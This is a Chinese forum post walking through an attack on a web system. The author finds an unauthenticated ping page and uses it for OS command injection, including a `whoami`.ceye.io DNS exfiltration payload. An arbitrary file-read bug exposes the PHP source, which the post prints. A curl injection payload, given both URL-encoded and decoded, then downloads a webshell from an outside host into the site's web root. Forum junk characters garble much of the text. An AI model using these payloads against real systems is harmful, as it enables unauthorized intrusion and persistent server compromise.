中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]

---

作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、
** **寻找突破口**

4 L7 a/ @: P0 Q" Z5 U**经过右键查看源代码发现系统的特征为：images/select_bg.png，去钟馗之眼搜索如图：**

% }" `# F3 A0 \* A- j

% j6 F4 I7 W7 V  w: f  H/ I
; F& l" |* t! l9 K
**发现reporter和[Technology,
Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征，然后一看之前搞过这样的系统，有源代码，对照源代码目录发现了未授权访问页面。**

# R6 v- }9 k7 {# o**地址为：**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**，如图：**

2 n* q) p2 g' z0 [
9 ~7 N! z1 B, a! U7 B2 T

**测试ping这里的功能，发现可以绕过ping正常功能执行命令，payload为：**
& J. ^$ ^% }, {
2 D2 c7 e  e& G**`whoami`.1111.ceye.io** **，如图：**

7 n( \- G' l, |9 q3 N7 h5 W  l
5 ^2 w' Y+ b' |5 ~

  g& h2 j5 }# |. a! D+ f
9 O) C- M& [0 R**返回dns记录如图：**
4 k9 k" ?# V- H4 h" t0 x6 s# M
3 d6 [. c6 C; x. r" I3 b
3 b8 C; e  X4 r' K; g0 K  i$ q

6 h% ?/ V8 o# b' J
) W! A# R  w# G) W1 Q6 v**发现当前用户权限为root**
, x& [" Y7 p7 Y6 F/ G
9 k2 r' L$ P4 d8 e9 A/ n$ W**一、
** **通过漏洞组合getwebshell**

**    ** **文章就按照挖洞顺序往下写，紧接着执行pwd命令获取web路径，如图：**
" t, i% g3 f% z* w
8 K- ^3 P1 `# a6 ?& O3 C
; @" ]2 n4 |+ o" A2 n: ]( l

" G# t& J$ l6 N( d, X
8 n4 v8 h  j! m  Y4 n**得知网站路径为：/var/www/html/view/systemconfig/systemtool/**

**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞，如下图为任意文件查看漏洞截图**

; ~, G# w% q3 ?6 M" P( U( C- n
) p' o. Q% r, D& B**Os** **命令注入存的处为：/var/www/html/view/Behavior/toQuery.php，这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的，通过任意文件查看漏洞，我们读取一下源代码**
* p) B' e- a5 Z# Z
; ~% o4 h" H- t\


0 V& Z0 i9 }- E0 ^) g* e% N**源代码为：**

<?php
% {' l, u# p2 kinclude_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
( m7 [. P, p1 Q* Q6 l1 \7 ^0 ^?>
) x4 b1 R* R: x0 q" ]% d/ T
<?php
& J+ ]) k" G% Z- B  d5 D7 Z& V
1 r7 _( A6 D$ g' p# u
" \0 T+ R, F8 n2 |/ s
session_start ();
2 j/ G+ g3 _7 c

! a8 L, K% G+ S  q# @

& [$ d+ a3 F- e7 B& E
0 U0 z1 {: O" b
7 a( E. G. d! L! Q
! D4 S; U* ?9 G% C& y- K! U2 R" Zif ($_GET ["objClass"] == "")

; [7 \6 R& ^1 x2 E% z
, w4 Z/ `3 d: W( ~
1 d: `* x! N$ d! L% K      exit ();

3 [! Z) k2 F# Z% F! Z# G
$ ^6 ]4 _2 V0 T, y
$param = $_REQUEST;



4 N0 X) d! B0 [, @$ h0 Z1 ]5 `" \
- v+ i: x' L$ c
$ i- b# U$ V" ~% {1 [

//echo "\n--------------------------\n";
" P  m) y0 j3 f; Q8 M( b) O
& o; z, D  k. D$ N2 O
& M, t$ T* L- T
//print_r($param);

: b& s' {+ M; k8 O7 y3 t7 A

6 E7 ~5 B/ c  O6 T( `% U//echo "\n--------------------------\n";
4 u2 i' T( K. B; j
  }( y, m2 l/ {

[if ($_GET ["method"] ==
# Z' O6 x+ y; e5 ^  ["getList" || $_GET ["method"] == "import" ||
$_GET ["method"] == "processAlarm") ](){

. d" N" ]/ K. c' y8 O% }$ C$ k

, |- L- R; F4 L3 x+ c! g- Y0 N      $param
) h7 k# h$ D' }' n3 c["user"] = $_SESSION ["s_userName"];
8 `+ z5 k0 e' O% k% m9 L! c5 Q
; }" b- F& J. X6 N9 n

1 \2 c2 z/ j- N- H  @9 \      $param
["lan"] = $_SESSION ["lan"];

5 c& ~! S9 y! b
+ x: x3 v& _. {% h6 l. h* D2 r
% A4 U- y  x6 }5 G4 p5 J) g      $param
["regUserpath"] = $_SESSION ["regUserpath"];
. o6 Z8 [2 E# g# s6 V& ^* v9 T
1 n( l4 \8 q: {3 @! J- L3 N8 h. z' X

: \4 y* Z2 b( B% I/ O6 g' g   
) \7 `4 g! U8 {8 {+ ?$ n

3 @! w& K5 h; v( s4 c
  C- _1 K. [, l6 v4 ~* u0 V      exec (
4 |8 ^; G. P( Z2 T) M( Z"rm -rf /tmp/cache" );
2 n+ a3 X6 W/ ?, ]

5 K" F- ]: _% i
      [$cmd = "/usr/local/php/bin/php ".$_SERVER
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
. N6 R& s3 V* K! M. Q' o! P( l


# F5 t$ S/ B' L# Q5 G8 l9 ^      $cmd .=
2 ?" G! z% X3 C" " . $_GET ["objClass"];

4 N  e! J' R) m5 J1 U$ a& z/ G
0 {( G; s- f' m) Q
      $cmd .=
" " . $_GET ["method"];

4 d" |8 K. ^* K* P1 Z# i% ^  b) k
' h3 U) b. d+ u/ e0 \  f7 F; x1 r4 t
      $cmd .=
, y( x0 s8 G# M! t$ J" " . base64_encode ( json_encode ( $param ) );

! S& R" r" ~" v' {3 t/ H( O
0 U/ o; d  R. ~7 _* }7 S3 N( I9 Z
% r( g+ ?/ h7 _8 Q      [file_put_contents("/tmp/query_cmd",$cmd);]()

6 r( N% d- b9 j+ d
4 ?, C, x4 w5 b3 J. {5 [3 x" a, X
      exec ( $cmd . "
: {. D. {% q5 u$ p0 a> /dev/null &" );


: [1 Q, `- l  l


} else {



      require_once
' G; U0 {3 G. |+ }* F+ ?, a($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
* M. w$ ^& N* }7 E4 M. v; s4 t5 V# c

( j* _; u: Q% i% o
% U, z( q' I* _/ w4 j8 q      $obj = new
QueryInterface ();

8 b, C( M$ F" K# n5 a
, P+ K& J# g% m; t
: p  F- D0 c+ I- ?& Q. _1 `      $instance =
& w# d2 ]# N4 a$obj->getInstance ();

: o, }: H9 y& D/ D. `) Z+ w( f, c3 R
" B8 N( Z8 T1 w7 Y1 V
% a  ~6 [8 {6 s! R8 r6 ~; \      $instance->invokeMethod
+ Z) o  R0 |* U( $_GET ["objClass"], $_GET ["method"], $param );



}

  B; {: n7 u& e, p' {

exit ();

" G  n' l! p. @
% m5 ?% V; `  {( @+ f" ?; v# e
?>
6 ~. Z& j3 Y. q: G
; z$ T! J8 m5 U) u# ]) \3 v**经常简单审计发现if ($_GET
["method"] == "getList" || $_GET ["method"] ==
; u! |7 o2 T/ L+ |- W"import" || $_GET ["method"] == "[processAlarm]()")，如果method只要等于getList、import、processAlarm这其中一个，$cmd =
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .
"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php，然后file_put_contents("/tmp/query_cmd",$cmd);**
) m& m* E) V4 o8 \% i9 }
$ H/ ~; E; m$ e4 f5 c9 j**      exec ( $cmd
. "  > /dev/null &" );** **给我们构造了一个命令注入的参数，这里直接造成了OS命令注入漏洞，下面看我演示**

. x! @2 Q8 w' h9 Q

4 n1 I4 \2 `3 J" B! \5 Q& l$ R

**图中objClass=存在OS命令注入漏洞，我之前试图通过bash反弹shell，但是测试了一晚上没反弹成功，最后选择了curl下载webshell，payload如下：**
; `" U  j& H) |; n7 ?* j. h7 [  H
! Y/ x8 b* J* g6 k2 G8 A**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**

) W3 @7 u3 ?9 j$ n5 G; ~**我们用url解码如下：**
7 _5 u1 o5 J" G0 S7 H
**|curl http://1.1.1.1/qYCwxRz1.zip -o
1 a: w1 }% M* e+ Y# I2 H. g/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o
/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)

7 n* ?2 z, K/ F**使用这么多管道符|就是要闭合payload，最后成功curl下载webshell如图：**
) s: S! N" T7 S9 |5 }3 D% H

7 [. z; p! C8 N, N0 E* M
4 o/ w: s1 d5 N

7 W% l% S# d  U( ~4 j# [
**三、总结**
! b$ V5 x" q+ G- c8 U5 o. x5 W
7 W5 q8 m, H4 p$ v) E**   ** **案例之所以最终获得webshell，很大程度上是取决于几个漏洞的组合，首先通过右键查看源代码找到目标系统使用的系统，因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面，通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径，其次，使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计，经过确认存在此漏洞，最后构造os命令执行payload，最终getwebshell，整个getwebshell过程就是一个漏洞的连环组合，渗透更多的时候是靠运气，如果这几个环节有一个环节漏洞不存在或者没挖到，可能导致getwebshell失败。**

- ~) |5 ^7 c1 A) Z6 Y2 s2 _. y! a**   ** **综上所述，运气与挖洞功底同等重要，谢谢观看** **！ **
[/md]

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2